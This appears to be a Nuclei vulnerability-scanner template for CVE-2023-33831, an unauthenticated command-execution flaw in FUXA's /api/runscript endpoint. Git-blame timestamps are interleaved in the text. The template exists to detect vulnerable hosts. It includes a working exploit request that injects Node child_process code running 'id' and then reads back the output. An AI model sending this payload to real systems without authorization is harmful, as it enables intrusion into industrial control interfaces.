2023-10-01 16:19:18 +00:00
id : CVE-2023-33831
info :
name : FUXA - Unauthenticated Remote Code Execution
author : gy741
severity : critical
description : |
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2023-33831
- https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831
2024-01-29 17:11:14 +00:00
- https://github.com/codeb0ss/CVE-2023-33831-PoC
- https://github.com/nomi-sec/PoC-in-GitHub
2023-10-01 16:19:18 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-33831
cwe-id : CWE-77
2024-05-31 19:23:20 +00:00
epss-score : 0.21555
epss-percentile : 0.96432
2023-10-01 16:19:18 +00:00
cpe : cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:*
2023-10-01 19:17:23 +00:00
metadata :
verified : "true"
2023-10-14 11:27:55 +00:00
max-request : 2
vendor : frangoteam
product : fuxa
2024-06-07 10:04:29 +00:00
fofa-query :
- title="FUXA"
- title="fuxa"
2023-10-03 06:43:22 +00:00
tags : cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth
2023-10-01 19:17:23 +00:00
variables :
filename : "{{rand_base(6)}}"
2023-10-01 16:19:18 +00:00
http :
- raw :
- |
POST /api/runscript HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
2023-10-01 19:17:23 +00:00
{"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/{{filename}}')" }}}
2023-10-01 16:19:18 +00:00
- |
2023-10-01 19:17:23 +00:00
GET /_images/{{filename}} HTTP/1.1
2023-10-01 16:19:18 +00:00
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
2023-10-01 19:17:23 +00:00
part : body_1
words :
- 'Script OK:'
- type : word
part : body_2
2023-10-01 16:19:18 +00:00
words :
- 'uid'
- 'gid'
- 'groups'
condition : and
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 4a0a0047304502203ecc9e2539c4ae2f8e80d3d097bd798fb303f0d202dbb192204c255ee474b6ea022100fb05e48650addf82e05cd993eb891e678cccb6e80b9780fb1215286f02fc549f:922c64590222798bb761d5b6d8e72950